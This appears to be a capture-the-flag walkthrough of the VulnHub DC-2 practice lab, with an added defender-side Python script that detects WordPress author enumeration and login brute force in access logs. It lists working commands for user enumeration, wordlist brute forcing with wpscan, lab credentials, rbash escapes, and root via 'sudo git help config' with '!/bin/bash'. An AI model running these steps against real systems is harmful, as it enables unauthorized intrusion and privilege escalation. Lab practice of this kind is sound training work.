DC2
Download address:
https://download.vulnhub.com/dc/DC-2.zip
Challenge description:
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it's designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
Information gathering
1.1 arp-scan -l
1.2 nmap -p- -sV -T5 192.168.126.132
1.3 whatweb 192.168.126.132
Modifying the hosts file
1.4 Port 80 answers with a 301 (permanent redirect); edit the local hosts file and then visit the site
1.5 Visiting again shows the site runs WordPress
1.6 Found the first flag
Building a password wordlist with cewl
2.1 The hint says to log into the admin backend as a different user, and that cewl may be needed
Crawl the site with cewl to generate a password wordlist:
cewl http://dc-2/ -w passwd.txt
2.2 WordPress admin (backend) address
Obtaining usernames
2.3 Manually enumerate users with the ?author=N method
author IDs 1 and 3 each reveal a user (two users in total):
dc-2/?author=1
dc-2/?author=3
2.4 wpscan detects three users
wpscan --url http://dc-2/ -e u
Save the usernames found by wpscan into usr.txt, one per line (the list used is not shown here):
echo "" > usr.txt
Brute force
2.5 Brute-force the logins with wpscan
wpscan --url http://dc-2/ -U usr.txt -P passwd.txt
jerry/adipiscing
tom/parturient
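The two steps above (walking ?author=N and hammering the login form) leave a distinctive trail in the web server's access log. As an added defender-side example, not part of the original walkthrough, the following Python script flags clients that request many distinct ?author= values or send a burst of POSTs to /wp-login.php. The log lines, IP addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache combined-log prefix: client IP, ident, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')

# Detection thresholds (assumed values; tune them to the site's normal traffic).
AUTHOR_IDS_THRESHOLD = 3    # distinct ?author=N values seen from one client
LOGIN_POSTS_THRESHOLD = 10  # POST /wp-login.php attempts from one client

# Constructed sample log (not real traffic). The first client walks ?author=1..4
# and then repeatedly POSTs to the login form; the second client is a normal visitor.
ATTACKER, VISITOR = "192.168.126.1", "192.168.126.50"
_lines = [f'{ATTACKER} - - [10/May/2024:10:00:0{n} +0000] "GET /?author={n} HTTP/1.1" 301 0 "-" "Mozilla/5.0"'
          for n in range(1, 5)]
_lines.append(f'{VISITOR} - - [10/May/2024:10:01:00 +0000] "GET /index.php/about/ HTTP/1.1" 200 5678 "-" "Mozilla/5.0"')
_lines.append(f'{VISITOR} - - [10/May/2024:10:01:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
_lines += [f'{ATTACKER} - - [10/May/2024:10:02:{n:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "scanner"'
           for n in range(12)]
SAMPLE_LOG = "\n".join(_lines)


def analyze(log_text):
    """Return {ip: [findings]} for clients that enumerate authors or brute-force logins."""
    author_ids = defaultdict(set)
    login_posts = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the whole run
        ip, method, path, _status = m.groups()
        a = AUTHOR_RE.search(path)
        if a:
            author_ids[ip].add(int(a.group(1)))
        if method == "POST" and path.split("?")[0] == "/wp-login.php":
            login_posts[ip] += 1
    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_IDS_THRESHOLD:
            findings[ip].append(f"author enumeration: {len(ids)} distinct ids {sorted(ids)}")
    for ip, n in login_posts.items():
        if n >= LOGIN_POSTS_THRESHOLD:
            findings[ip].append(f"login brute force: {n} POSTs to /wp-login.php")
    return dict(findings)


if __name__ == "__main__":
    for ip, notes in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(notes))
```

Blocking ?author= redirects in the web server config and rate-limiting wp-login.php are the usual mitigations the same log evidence would justify.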
2.6 jerry/adipiscing
Log into the backend and find flag2
The hint says there is nothing more to exploit in WordPress, so take another route
SSH has not been tried yet
3.1 ssh tom@192.168.126.132 -p 7744
3.2 ls
cat flag3.txt
The shell turns out to be restricted by rbash
rbash bypass
3.3 rbash bypass
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
3.4 The flag mentions jerry; use su to switch to jerry
su jerry
adipiscing
cd /home/jerry
ls
3.5 cat flag4.txt
flag4 hints at git
Privilege escalation via git
4.1 Privilege escalation via git
sudo -l
Escalate via git: open the help page, then type the following at the pager prompt
sudo git help config
!/bin/bash
4.2 Privilege escalation succeeded
cd /root
cat final-flag.txt
4.3 Obtained the final flag
Supplementary notes
List the commands available in the restricted shell
compgen -c
Contents of flag3
poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Alternative rbash escape with vi
vi flag3.txt
:set shell=/bin/sh  (then press Enter)
:shell  (then press Enter)
Switch to jerry and find flag4